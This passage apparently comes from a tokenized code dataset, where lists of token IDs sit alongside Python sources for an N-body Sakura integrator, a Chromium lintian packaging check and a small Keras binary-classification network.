10668,
11971,
739,
262,
2846,
286,
262,
24843,
13789,
11,
10628,
198,
2,
362,
13,
15,
11,
290,
262,
347,
10305,
13789,
13,
4091,
262,
38559,
24290,
2393,
287,
262,
6808,
286,
428,
16099,
198,
2,
329,
1844,
3307,
13,
198,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
198,
198,
11748,
25064,
198,
6738,
1233,
26791,
13,
535,
3361,
5329,
1330,
649,
62,
5589,
5329,
198,
6738,
1233,
26791,
13,
17080,
1330,
27484,
198,
198,
6738,
269,
487,
72,
1330,
376,
11674,
628,
198,
4299,
1382,
62,
487,
72,
62,
1640,
62,
30786,
7,
21412,
62,
3672,
11,
8265,
62,
40290,
11,
13103,
11,
12782,
41888,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3131,
62,
5589,
576,
62,
22046,
41888,
4357,
3131,
62,
8726,
62,
22046,
28,
21737,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
3401,
5028,
5610,
287,
7559,
18170,
15506,
815,
423,
262,
1708,
12608,
25,
628,
220,
220,
220,
1635,
7559,
1268,
39149,
1546,
15506,
25,
317,
4731,
7268,
327,
3407,
13,
198,
220,
220,
220,
1635,
7559,
9936,
47,
1546,
15506,
25,
317,
4731,
7268,
327,
31713,
329,
3858,
13,
198,
220,
220,
220,
1635,
7559,
42296,
4177,
11053,
15506,
25,
317,
4731,
7268,
327,
31713,
329,
5499,
13,
198,
220,
220,
220,
1635,
7559,
44721,
49,
2640,
15506,
25,
317,
4731,
7268,
327,
31713,
329,
597,
34749,
13,
198,
220,
220,
220,
1635,
7559,
34,
7759,
2662,
14887,
18421,
15506,
25,
317,
4731,
7268,
14977,
1353,
12,
5715,
327,
2438,
11,
428,
198,
220,
220,
220,
220,
220,
220,
220,
460,
307,
973,
284,
466,
1243,
588,
1332,
329,
257,
8160,
290,
2148,
281,
198,
220,
220,
220,
220,
220,
220,
220,
13527,
7822,
1912,
319,
326,
13,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
3858,
796,
17635,
198,
220,
220,
220,
3407,
796,
17635,
198,
220,
220,
220,
5499,
796,
17635,
198,
220,
220,
220,
34749,
796,
17635,
198,
220,
220,
220,
2183,
4582,
796,
17635,
198,
220,
220,
220,
329,
1438,
287,
13103,
25,
198,
220,
220,
220,
220,
220,
220,
220,
11593,
11748,
834,
7,
21412,
62,
40290,
1343,
1438,
8,
198,
220,
220,
220,
220,
220,
220,
220,
8265,
796,
25064,
13,
18170,
58,
21412,
62,
40290,
1343,
1438,
60,
628,
220,
220,
220,
220,
220,
220,
220,
3858,
13,
33295,
7,
21412,
13,
9936,
47,
1546,
8,
198,
220,
220,
220,
220,
220,
220,
220,
34749,
13,
33295,
7,
21412,
13,
44721,
49,
2640,
8,
198,
220,
220,
220,
220,
220,
220,
220,
5499,
13,
33295,
7,
21412,
13,
42296,
4177,
11053,
8,
198,
220,
220,
220,
220,
220,
220,
220,
3407,
13,
33295,
7,
21412,
13,
1268,
39149,
1546,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2183,
4582,
13,
33295,
7,
21412,
13,
34,
7759,
2662,
14887,
18421,
8,
628,
220,
220,
220,
1303,
775,
2291,
5499,
994,
523,
326,
611,
356,
1392,
597,
286,
511,
17336,
198,
220,
220,
220,
1303,
2642,
11,
262,
10238,
327,
17050,
481,
22818,
13,
554,
327,
345,
389,
3142,
198,
220,
220,
220,
1303,
284,
302,
12,
32446,
533,
257,
2163,
611,
340,
468,
262,
976,
9877,
13,
1320,
318,
25,
198,
220,
220,
220,
1303,
220,
220,
493,
22944,
7,
600,
1776,
198,
220,
220,
220,
1303,
220,
220,
493,
22944,
7,
600,
1776,
198,
220,
220,
220,
1303,
318,
2742,
11,
475,
262,
1708,
481,
2038,
284,
17632,
25,
198,
220,
220,
220,
1303,
220,
220,
493,
22944,
7,
600,
1776,
198,
220,
220,
220,
1303,
220,
220,
493,
22944,
7,
19509,
1776,
198,
220,
220,
220,
1303,
198,
220,
220,
220,
1303,
27713,
1279,
283,
14031,
29,
1400,
11,
340,
318,
257,
2089,
2126,
13,
220,
4946,
31127,
2346,
12444,
284,
25393,
198,
220,
220,
220,
1303,
262,
17336,
11,
588,
4375,
257,
705,
9979,
6,
357,
3826,
2071,
1303,
1495,
2425,
737,
220,
3887,
198,
220,
220,
220,
1303,
640,
484,
466,
523,
11,
340,
1838,
257,
14586,
42412,
2270,
287,
428,
2438,
13,
220,
632,
318,
198,
220,
220,
220,
1303,
1365,
284,
8814,
319,
262,
327,
17050,
329,
326,
11,
543,
318,
257,
1310,
1643,
198,
220,
220,
220,
1303,
517,
12846,
13,
220,
1320,
338,
262,
966,
286,
900,
62,
10459,
22446,
220,
775,
460,
991,
198,
220,
220,
220,
1303,
302,
12,
21633,
262,
1627,
7559,
2,
12543,
2733,
1343,
15506,
2174,
284,
651,
262,
2656,
198,
220,
220,
220,
1303,
4069,
13,
220,
357,
40,
561,
7139,
340,
1141,
5254,
11,
475,
314,
836,
470,
1064,
597,
198,
220,
220,
220,
1303,
2183,
1332,
379,
477,
492,
3548,
8,
198,
220,
220,
220,
1303,
198,
220,
220,
220,
11767,
62,
10459,
796,
37082,
77,
1911,
22179,
7,
198,
220,
220,
220,
220,
220,
220,
220,
3407,
1343,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
12543,
2733,
1343,
198,
220,
220,
220,
220,
220,
220,
220,
2183,
4582,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
277,
12463,
796,
1382,
62,
487,
72,
7,
198,
220,
220,
220,
220,
220,
220,
220,
8265,
62,
3672,
11,
198,
220,
220,
220,
220,
220,
220,
220,
269,
4299,
62,
10459,
2625,
59,
77,
1911,
22179,
7,
19199,
1343,
5499,
1343,
34749,
828,
198,
220,
220,
220,
220,
220,
220,
220,
11767,
62,
10459,
28,
332,
1958,
62,
10459,
11,
198,
220,
220,
220,
220,
220,
220,
220,
12782,
28,
75,
11127,
11,
198,
220,
220,
220,
220,
220,
220,
220,
3131,
62,
5589,
576,
62,
22046,
28,
26086,
62,
5589,
576,
62,
22046,
11,
198,
220,
220,
220,
220,
220,
220,
220,
3131,
62,
8726,
62,
22046,
28,
26086,
62,
8726,
62,
22046,
11,
198,
220,
220,
220,
1267,
628,
220,
220,
220,
1441,
277,
12463,
628,
628,
198,
4299,
17050,
62,
4906,
33529,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
29620,
262,
17050,
2099,
422,
1233,
26791,
13,
1550,
3964,
351,
6579,
15922,
340,
481,
307,
198,
220,
220,
220,
366,
907,
28435,
1911,
1550,
7294,
1395,
290,
32639,
340,
318,
366,
403,
844,
1911,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1233,
796,
27484,
3419,
198,
220,
220,
220,
1233,
13,
29572,
62,
11250,
62,
16624,
3419,
198,
220,
220,
220,
23991,
796,
1233,
13,
1136,
62,
21812,
62,
26801,
10786,
11249,
11537,
198,
220,
220,
220,
23991,
13,
641,
495,
62,
20311,
1143,
3419,
198,
220,
220,
220,
17050,
796,
649,
62,
5589,
5329,
7,
5589,
5329,
28,
28758,
13,
5589,
5329,
8,
198,
220,
220,
220,
1441,
17050,
13,
5589,
5329,
62,
4906,
198
] | 2.792487 | 1,118 |
# -*- coding: utf-8 -*-
#
"""
TODO.
"""
from __future__ import print_function, division
import logging
from ..integrator import Base
from ..lib import extensions
from ..lib.utils.timing import decallmethods, timings
__all__ = ["Sakura"]
logger = logging.getLogger(__name__)
def sakura_step(ps, tau):
"""
"""
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
extensions.sakura.calc(ps, ps, tau/2, -1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
extensions.sakura.calc(ps, ps, tau/2, 1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
return ps
@decallmethods(timings)
class Sakura(Base):
"""
"""
PROVIDED_METHODS = ['sakura', 'asakura',
]
def __init__(self, eta, time, ps, method, **kwargs):
"""
"""
super(Sakura, self).__init__(eta, time, ps, **kwargs)
self.method = method
self.e0 = None
def initialize(self, t_end):
"""
"""
logger.info("Initializing '%s' integrator.",
self.method)
ps = self.ps
if self.reporter:
self.reporter.diagnostic_report(ps)
if self.dumpper:
self.dumpper.dump_worldline(ps)
if self.viewer:
self.viewer.show_event(ps)
self.is_initialized = True
def finalize(self, t_end):
"""
"""
logger.info("Finalizing '%s' integrator.",
self.method)
ps = self.ps
if self.viewer:
self.viewer.show_event(ps)
self.viewer.enter_main_loop()
def get_sakura_tstep(self, ps, eta, tau):
"""
"""
ps.set_tstep(ps, eta)
iw2_a = (eta/ps.tstep)**2
iw2_b = (eta/ps.tstepij)**2
diw2 = (iw2_a - iw2_b)
w2_sakura = diw2.max()
dt_sakura = eta/(1 + w2_sakura)**0.5
ps.tstep[...] = dt_sakura
min_bts = self.get_min_block_tstep(ps, tau)
return min_bts
def do_step(self, ps, tau):
"""
"""
# p0 = p.copy()
# if self.e0 is None:
# self.e0 = p0.kinetic_energy + p0.potential_energy
# de = [1]
# tol = tau**2
# nsteps = 1
#
# while abs(de[0]) > tol:
# p = p0.copy()
# dt = tau / nsteps
# for i in range(nsteps):
# p = sakura_step(p, dt)
# e1 = p.kinetic_energy + p.potential_energy
# de[0] = e1/self.e0 - 1
# if abs(de[0]) > tol:
## nsteps += (nsteps+1)//2
# nsteps *= 2
## print(nsteps, de, tol)
# break
if "asakura" in self.method:
tau = self.get_sakura_tstep(ps, self.eta, tau)
ps = sakura_step(ps, tau)
type(ps).t_curr += tau
ps.tstep[...] = tau
ps.time += tau
ps.nstep += 1
if self.dumpper:
slc = ps.time % (self.dump_freq * tau) == 0
if any(slc):
self.wl.append(ps[slc])
if self.viewer:
slc = ps.time % (self.gl_freq * tau) == 0
if any(slc):
self.viewer.show_event(ps[slc])
return ps
########## end of file ##########
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
198,
198,
37811,
198,
51,
3727,
46,
13,
198,
37811,
628,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
11,
7297,
198,
11748,
18931,
198,
6738,
11485,
18908,
12392,
1330,
7308,
198,
6738,
11485,
8019,
1330,
18366,
198,
6738,
11485,
8019,
13,
26791,
13,
16514,
278,
1330,
875,
439,
24396,
82,
11,
4628,
654,
628,
198,
834,
439,
834,
796,
14631,
50,
47754,
8973,
628,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628,
198,
4299,
264,
47754,
62,
9662,
7,
862,
11,
256,
559,
2599,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
37227,
198,
220,
220,
220,
26692,
13,
40914,
15853,
26692,
13,
85,
87,
1635,
256,
559,
1220,
362,
198,
220,
220,
220,
26692,
13,
563,
15853,
26692,
13,
7670,
1635,
256,
559,
1220,
362,
198,
220,
220,
220,
26692,
13,
81,
89,
15853,
26692,
13,
85,
89,
1635,
256,
559,
1220,
362,
628,
220,
220,
220,
18366,
13,
82,
47754,
13,
9948,
66,
7,
862,
11,
26692,
11,
256,
559,
14,
17,
11,
532,
16,
8,
198,
220,
220,
220,
26692,
13,
40914,
15853,
26692,
13,
7109,
87,
198,
220,
220,
220,
26692,
13,
563,
15853,
26692,
13,
39140,
198,
220,
220,
220,
26692,
13,
81,
89,
15853,
26692,
13,
7109,
89,
198,
220,
220,
220,
26692,
13,
85,
87,
15853,
26692,
13,
67,
85,
87,
198,
220,
220,
220,
26692,
13,
7670,
15853,
26692,
13,
67,
7670,
198,
220,
220,
220,
26692,
13,
85,
89,
15853,
26692,
13,
67,
85,
89,
628,
220,
220,
220,
18366,
13,
82,
47754,
13,
9948,
66,
7,
862,
11,
26692,
11,
256,
559,
14,
17,
11,
352,
8,
198,
220,
220,
220,
26692,
13,
40914,
15853,
26692,
13,
7109,
87,
198,
220,
220,
220,
26692,
13,
563,
15853,
26692,
13,
39140,
198,
220,
220,
220,
26692,
13,
81,
89,
15853,
26692,
13,
7109,
89,
198,
220,
220,
220,
26692,
13,
85,
87,
15853,
26692,
13,
67,
85,
87,
198,
220,
220,
220,
26692,
13,
7670,
15853,
26692,
13,
67,
7670,
198,
220,
220,
220,
26692,
13,
85,
89,
15853,
26692,
13,
67,
85,
89,
628,
220,
220,
220,
26692,
13,
40914,
15853,
26692,
13,
85,
87,
1635,
256,
559,
1220,
362,
198,
220,
220,
220,
26692,
13,
563,
15853,
26692,
13,
7670,
1635,
256,
559,
1220,
362,
198,
220,
220,
220,
26692,
13,
81,
89,
15853,
26692,
13,
85,
89,
1635,
256,
559,
1220,
362,
628,
220,
220,
220,
1441,
26692,
628,
198,
31,
12501,
439,
24396,
82,
7,
16514,
654,
8,
198,
4871,
20574,
7,
14881,
2599,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
37227,
198,
220,
220,
220,
36592,
2389,
1961,
62,
49273,
50,
796,
37250,
82,
47754,
3256,
705,
292,
47754,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2361,
628,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
11,
2123,
64,
11,
640,
11,
26692,
11,
2446,
11,
12429,
46265,
22046,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2208,
7,
50,
47754,
11,
2116,
737,
834,
15003,
834,
7,
17167,
11,
640,
11,
26692,
11,
12429,
46265,
22046,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
24396,
796,
2446,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
68,
15,
796,
6045,
628,
220,
220,
220,
825,
41216,
7,
944,
11,
256,
62,
437,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
49706,
13,
10951,
7203,
24243,
2890,
705,
4,
82,
6,
4132,
12392,
33283,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
24396,
8,
628,
220,
220,
220,
220,
220,
220,
220,
26692,
796,
2116,
13,
862,
628,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
260,
26634,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
260,
26634,
13,
47356,
15132,
62,
13116,
7,
862,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
67,
388,
2848,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
67,
388,
2848,
13,
39455,
62,
6894,
1370,
7,
862,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
1177,
263,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
1177,
263,
13,
12860,
62,
15596,
7,
862,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
271,
62,
17532,
796,
6407,
628,
220,
220,
220,
825,
2457,
1096,
7,
944,
11,
256,
62,
437,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
49706,
13,
10951,
7203,
19006,
2890,
705,
4,
82,
6,
4132,
12392,
33283,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
24396,
8,
628,
220,
220,
220,
220,
220,
220,
220,
26692,
796,
2116,
13,
862,
628,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
1177,
263,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
1177,
263,
13,
12860,
62,
15596,
7,
862,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
1177,
263,
13,
9255,
62,
12417,
62,
26268,
3419,
628,
220,
220,
220,
825,
651,
62,
82,
47754,
62,
83,
9662,
7,
944,
11,
26692,
11,
2123,
64,
11,
256,
559,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
26692,
13,
2617,
62,
83,
9662,
7,
862,
11,
2123,
64,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1312,
86,
17,
62,
64,
796,
357,
17167,
14,
862,
13,
83,
9662,
8,
1174,
17,
198,
220,
220,
220,
220,
220,
220,
220,
1312,
86,
17,
62,
65,
796,
357,
17167,
14,
862,
13,
83,
9662,
2926,
8,
1174,
17,
628,
220,
220,
220,
220,
220,
220,
220,
2566,
86,
17,
796,
357,
14246,
17,
62,
64,
532,
1312,
86,
17,
62,
65,
8,
628,
220,
220,
220,
220,
220,
220,
220,
266,
17,
62,
82,
47754,
796,
2566,
86,
17,
13,
9806,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
288,
83,
62,
82,
47754,
796,
2123,
64,
29006,
16,
1343,
266,
17,
62,
82,
47754,
8,
1174,
15,
13,
20,
628,
220,
220,
220,
220,
220,
220,
220,
26692,
13,
83,
9662,
58,
22345,
796,
288,
83,
62,
82,
47754,
628,
220,
220,
220,
220,
220,
220,
220,
949,
62,
65,
912,
796,
2116,
13,
1136,
62,
1084,
62,
9967,
62,
83,
9662,
7,
862,
11,
256,
559,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
949,
62,
65,
912,
628,
220,
220,
220,
825,
466,
62,
9662,
7,
944,
11,
26692,
11,
256,
559,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
2,
220,
220,
220,
220,
220,
220,
220,
279,
15,
796,
279,
13,
30073,
3419,
198,
2,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
68,
15,
318,
6045,
25,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
68,
15,
796,
279,
15,
13,
5116,
5139,
62,
22554,
1343,
279,
15,
13,
13059,
1843,
62,
22554,
198,
2,
220,
220,
220,
220,
220,
220,
220,
390,
796,
685,
16,
60,
198,
2,
220,
220,
220,
220,
220,
220,
220,
284,
75,
796,
256,
559,
1174,
17,
198,
2,
220,
220,
220,
220,
220,
220,
220,
299,
20214,
796,
352,
198,
2,
198,
2,
220,
220,
220,
220,
220,
220,
220,
981,
2352,
7,
2934,
58,
15,
12962,
1875,
284,
75,
25,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
279,
796,
279,
15,
13,
30073,
3419,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
83,
796,
256,
559,
1220,
299,
20214,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
1312,
287,
2837,
7,
77,
20214,
2599,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
279,
796,
264,
47754,
62,
9662,
7,
79,
11,
288,
83,
8,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
304,
16,
796,
279,
13,
5116,
5139,
62,
22554,
1343,
279,
13,
13059,
1843,
62,
22554,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
390,
58,
15,
60,
796,
304,
16,
14,
944,
13,
68,
15,
532,
352,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
2352,
7,
2934,
58,
15,
12962,
1875,
284,
75,
25,
198,
2235,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
299,
20214,
15853,
357,
77,
20214,
10,
16,
8,
1003,
17,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
299,
20214,
1635,
28,
362,
198,
2235,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7,
77,
20214,
11,
390,
11,
284,
75,
8,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2270,
628,
220,
220,
220,
220,
220,
220,
220,
611,
366,
292,
47754,
1,
287,
2116,
13,
24396,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
256,
559,
796,
2116,
13,
1136,
62,
82,
47754,
62,
83,
9662,
7,
862,
11,
2116,
13,
17167,
11,
256,
559,
8,
198,
220,
220,
220,
220,
220,
220,
220,
26692,
796,
264,
47754,
62,
9662,
7,
862,
11,
256,
559,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2099,
7,
862,
737,
83,
62,
22019,
81,
15853,
256,
559,
198,
220,
220,
220,
220,
220,
220,
220,
26692,
13,
83,
9662,
58,
22345,
796,
256,
559,
198,
220,
220,
220,
220,
220,
220,
220,
26692,
13,
2435,
15853,
256,
559,
198,
220,
220,
220,
220,
220,
220,
220,
26692,
13,
77,
9662,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
67,
388,
2848,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1017,
66,
796,
26692,
13,
2435,
4064,
357,
944,
13,
39455,
62,
19503,
80,
1635,
256,
559,
8,
6624,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
597,
7,
6649,
66,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
40989,
13,
33295,
7,
862,
58,
6649,
66,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
1177,
263,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1017,
66,
796,
26692,
13,
2435,
4064,
357,
944,
13,
4743,
62,
19503,
80,
1635,
256,
559,
8,
6624,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
597,
7,
6649,
66,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
1177,
263,
13,
12860,
62,
15596,
7,
862,
58,
6649,
66,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
26692,
628,
198,
7804,
2235,
886,
286,
2393,
1303,
7804,
2,
198
] | 1.756716 | 2,010 |
from serif.model.event_mention_model import EventMentionModel
# Modified from DummyEventMentionModel
| [
6738,
1055,
361,
13,
19849,
13,
15596,
62,
434,
295,
62,
19849,
1330,
8558,
44,
1463,
17633,
628,
198,
2,
40499,
422,
360,
13513,
9237,
44,
1463,
17633,
198
] | 3.551724 | 29 |
#!/usr/bin/env python
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Performs some static analysis checks on Chrome debian packages
using lintian.
"""
import argparse
import os
import subprocess
SUPPRESSIONS = [
# Google Chrome is not software available on a distro by default,
# so installing to /opt is correct behavior.
'dir-or-file-in-opt',
# Distros usually don't like libraries to be statically linked
# into binaries because it's easier to push a security patch on a
# single package than to update many packages. Chromium
# statically links some libraries anyway.
'embedded-library',
# The setuid sandbox is a setuid binary.
'setuid-binary',
# Some nacl binaries are statically linked but don't have "static"
# in their name.
'statically-linked-binary',
# Build configurations with is_official_build=false don't compress
# the packages.
'uses-no-compression-for-data-tarball',
]
parser = argparse.ArgumentParser()
parser.add_argument('package', help='path/to/package.deb')
args = parser.parse_args()
package = os.path.abspath(args.package)
cmd = [
'lintian',
package,
'--no-tag-display-limit',
'--pedantic',
'--suppress-tags',
','.join(SUPPRESSIONS)
]
subprocess.check_call(cmd)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
15069,
2177,
383,
18255,
1505,
46665,
13,
1439,
2489,
10395,
13,
198,
2,
5765,
286,
428,
2723,
2438,
318,
21825,
416,
257,
347,
10305,
12,
7635,
5964,
326,
460,
307,
198,
2,
1043,
287,
262,
38559,
24290,
2393,
13,
198,
198,
37811,
5990,
23914,
617,
9037,
3781,
8794,
319,
13282,
50001,
10392,
198,
3500,
300,
600,
666,
13,
198,
37811,
198,
198,
11748,
1822,
29572,
198,
11748,
28686,
198,
11748,
850,
14681,
628,
198,
40331,
32761,
11053,
796,
685,
198,
220,
220,
220,
1303,
3012,
13282,
318,
407,
3788,
1695,
319,
257,
1233,
305,
416,
4277,
11,
198,
220,
220,
220,
1303,
523,
15975,
284,
1220,
8738,
318,
3376,
4069,
13,
198,
220,
220,
220,
705,
15908,
12,
273,
12,
7753,
12,
259,
12,
8738,
3256,
198,
220,
220,
220,
1303,
4307,
4951,
3221,
836,
470,
588,
12782,
284,
307,
47746,
6692,
198,
220,
220,
220,
1303,
656,
38640,
780,
340,
338,
4577,
284,
4574,
257,
2324,
8529,
319,
257,
198,
220,
220,
220,
1303,
2060,
5301,
621,
284,
4296,
867,
10392,
13,
220,
18255,
1505,
198,
220,
220,
220,
1303,
47746,
6117,
617,
12782,
6949,
13,
198,
220,
220,
220,
705,
20521,
9395,
12,
32016,
3256,
198,
220,
220,
220,
1303,
383,
900,
27112,
35204,
318,
257,
900,
27112,
13934,
13,
198,
220,
220,
220,
705,
2617,
27112,
12,
39491,
3256,
198,
220,
220,
220,
1303,
2773,
299,
37779,
38640,
389,
47746,
6692,
475,
836,
470,
423,
366,
12708,
1,
198,
220,
220,
220,
1303,
287,
511,
1438,
13,
198,
220,
220,
220,
705,
301,
4142,
12,
25614,
12,
39491,
3256,
198,
220,
220,
220,
1303,
10934,
25412,
351,
318,
62,
16841,
62,
11249,
28,
9562,
836,
470,
27413,
198,
220,
220,
220,
1303,
262,
10392,
13,
198,
220,
220,
220,
705,
2664,
12,
3919,
12,
5589,
2234,
12,
1640,
12,
7890,
12,
18870,
1894,
3256,
198,
60,
628,
198,
48610,
796,
1822,
29572,
13,
28100,
1713,
46677,
3419,
198,
48610,
13,
2860,
62,
49140,
10786,
26495,
3256,
1037,
11639,
6978,
14,
1462,
14,
26495,
13,
11275,
11537,
198,
22046,
796,
30751,
13,
29572,
62,
22046,
3419,
198,
26495,
796,
28686,
13,
6978,
13,
397,
2777,
776,
7,
22046,
13,
26495,
8,
198,
198,
28758,
796,
685,
198,
220,
220,
220,
705,
75,
600,
666,
3256,
198,
220,
220,
220,
5301,
11,
198,
220,
220,
220,
705,
438,
3919,
12,
12985,
12,
13812,
12,
32374,
3256,
198,
220,
220,
220,
705,
438,
9124,
5109,
3256,
198,
220,
220,
220,
705,
438,
18608,
601,
12,
31499,
3256,
198,
220,
220,
220,
705,
4032,
13,
22179,
7,
40331,
32761,
11053,
8,
198,
60,
198,
7266,
14681,
13,
9122,
62,
13345,
7,
28758,
8,
198
] | 3.092715 | 453 |
"""
Multilayer Perceptron model for binary classification.
The model has 10 inputs, 3 hidden layers with 10, 20, and 10 neurons,and an output layer with 1 output.
Rectified linear activation functions are used in each hidden layer
and a sigmoid activation function is used in the output layer,for binary classification."""
import tensorflow as tf
# from tensorflow.keras.utils import plot_model
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Dense
visible = Input(shape=(10,))
hidden1 = Dense(10, activation= 'relu' )(visible)
hidden2 = Dense(20, activation= 'relu' )(hidden1)
hidden3 = Dense(10, activation= 'relu' )(hidden2)
output = Dense(1, activation= 'sigmoid' )(hidden3)
model = Model(inputs=visible, outputs=output)
# summarize layers
model.summary()
# plot graph
# plot_model(model, to_file= 'mlp_graph.png' )
| [
37811,
198,
15205,
346,
2794,
2448,
984,
1313,
2746,
329,
13934,
17923,
13,
220,
198,
198,
464,
2746,
468,
838,
17311,
11,
513,
7104,
11685,
351,
838,
11,
1160,
11,
290,
838,
16890,
11,
392,
281,
5072,
7679,
351,
352,
5072,
13,
198,
45474,
1431,
14174,
14916,
5499,
389,
973,
287,
1123,
7104,
7679,
220,
198,
392,
257,
264,
17225,
1868,
14916,
2163,
318,
973,
287,
262,
5072,
7679,
11,
1640,
13934,
17923,
526,
15931,
198,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
2,
422,
11192,
273,
11125,
13,
6122,
292,
13,
26791,
1330,
7110,
62,
19849,
198,
6738,
11192,
273,
11125,
13,
6122,
292,
13,
27530,
1330,
9104,
198,
6738,
11192,
273,
11125,
13,
6122,
292,
13,
75,
6962,
1330,
23412,
198,
6738,
11192,
273,
11125,
13,
6122,
292,
13,
75,
6962,
1330,
360,
1072,
198,
198,
23504,
796,
23412,
7,
43358,
16193,
940,
11,
4008,
198,
30342,
16,
796,
360,
1072,
7,
940,
11,
14916,
28,
705,
260,
2290,
6,
1267,
7,
23504,
8,
198,
30342,
17,
796,
360,
1072,
7,
1238,
11,
14916,
28,
705,
260,
2290,
6,
1267,
7,
30342,
16,
8,
198,
30342,
18,
796,
360,
1072,
7,
940,
11,
14916,
28,
705,
260,
2290,
6,
1267,
7,
30342,
17,
8,
198,
